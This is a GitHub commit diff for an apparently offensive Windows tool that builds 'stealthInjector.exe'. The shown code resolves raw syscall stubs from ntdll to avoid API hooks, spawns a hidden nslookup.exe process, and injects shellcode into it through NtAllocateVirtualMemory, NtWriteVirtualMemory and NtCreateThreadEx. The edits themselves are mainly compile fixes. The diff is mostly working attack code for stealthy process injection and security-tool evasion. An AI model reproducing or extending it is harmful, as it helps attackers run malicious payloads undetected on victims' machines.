fixed some shit

JohnWoodman · Oct 24, 2020 · c36c5e2 · c36c5e2
1 parent 2c0e2f0
commit c36c5e2
Show file tree

Hide file tree

Showing 47 changed files with 13 additions and 522 deletions.
diff --git a/Makefile b/Makefile
@@ -0,0 +1,2 @@
+injectShellcode: injectShellcode.cpp
+	x86_64-w64-mingw32-g++ -static injectShellcode.cpp -o stealthInjector.exe
diff --git a/getSyscall.h b/getSyscall.h
@@ -1,6 +1,6 @@
 #pragma once
 #include <iostream>
-#include "Windows.h"
+#include "windows.h"
 #include "winternl.h"
 #pragma comment(lib, "ntdll")
 
@@ -32,7 +32,7 @@ BOOL GetSyscallStub(LPCSTR functionName, LPVOID syscallStub)
 
 	for (int i = 0; i < imageNTHeaders->FileHeader.NumberOfSections; i++)
 	{
-		if (std::strcmp((CHAR*)section->Name, (CHAR*)".rdata") == 0) {
+		if (strcmp((CHAR*)section->Name, (CHAR*)".rdata") == 0) {
 			rdataSection = section;
 			break;
 		}
@@ -50,9 +50,9 @@ BOOL GetSyscallStub(LPCSTR functionName, LPVOID syscallStub)
 		DWORD_PTR functionNameVA = (DWORD_PTR)RVAtoRawOffset((DWORD_PTR)fileData + addressOfNames[i], rdataSection);
 		DWORD_PTR functionVA = (DWORD_PTR)RVAtoRawOffset((DWORD_PTR)fileData + addressOfFunctions[i + 1], textSection);
 		LPCSTR functionNameResolved = (LPCSTR)functionNameVA;
-		if (std::strcmp(functionNameResolved, functionName) == 0)
+		if (strcmp(functionNameResolved, functionName) == 0)
 		{
-			std::memcpy(syscallStub, (LPVOID)functionVA, SYSCALL_STUB_SIZE);
+			memcpy(syscallStub, (LPVOID)functionVA, SYSCALL_STUB_SIZE);
 			stubFound = TRUE;
 		}
 	}

diff --git a/injectShellcode.cpp b/injectShellcode.cpp
@@ -1,5 +1,5 @@
 #include <iostream>
-#include "Windows.h"
+#include "windows.h"
 #include "winternl.h"
 #include "getSyscall.h"
 #include <fstream>
@@ -9,6 +9,7 @@
 #include <string>
 #include <fstream>
 #include <sstream>
+#define UNICODE 1
 #pragma comment(lib, "ntdll")
 
 /* put your shellcode here, I'll eventually add a command line option to read in shellcode from file */
@@ -61,7 +62,7 @@ int injectShellcode(BOOL spawnProc, int PID, BOOL unsafe) {
 	LPVOID allocation_start;
 	STARTUPINFO si;
 	PROCESS_INFORMATION pi;
-	LPCWSTR cmd;
+	LPCSTR cmd;
 	myNtAllocateVirutalMemory NtAllocateVirtualMemory;
 	myNtWriteVirtualMemory NtWriteVirtualMemory;
 	myNtCreateThreadEx NtCreateThreadEx;
@@ -78,9 +79,10 @@ int injectShellcode(BOOL spawnProc, int PID, BOOL unsafe) {
 		ZeroMemory(&si, sizeof(si));
 		ZeroMemory(&pi, sizeof(pi));
 		si.cb = sizeof(si);
-		cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");
+		//cmd = TEXT("C:\\Windows\\System32\\nslookup.exe");
+		cmd = "C:\\Windows\\System32\\nslookup.exe";
 
-		if (!CreateProcess(
+		if (!CreateProcessA(
 			cmd,							// Executable
 			NULL,							// Command line
 			NULL,							// Process handle not inheritable
@@ -89,7 +91,7 @@ int injectShellcode(BOOL spawnProc, int PID, BOOL unsafe) {
 			CREATE_NO_WINDOW,	            // Do Not Open a Window
 			NULL,							// Use parent's environment block
 			NULL,							// Use parent's starting directory 
-			&si,			                // Pointer to STARTUPINFO structure
+			(LPSTARTUPINFOA) &si,			                // Pointer to STARTUPINFO structure
 			&pi								// Pointer to PROCESS_INFORMATION structure (removed extra parentheses)
 		)) {
 			DWORD errval = GetLastError();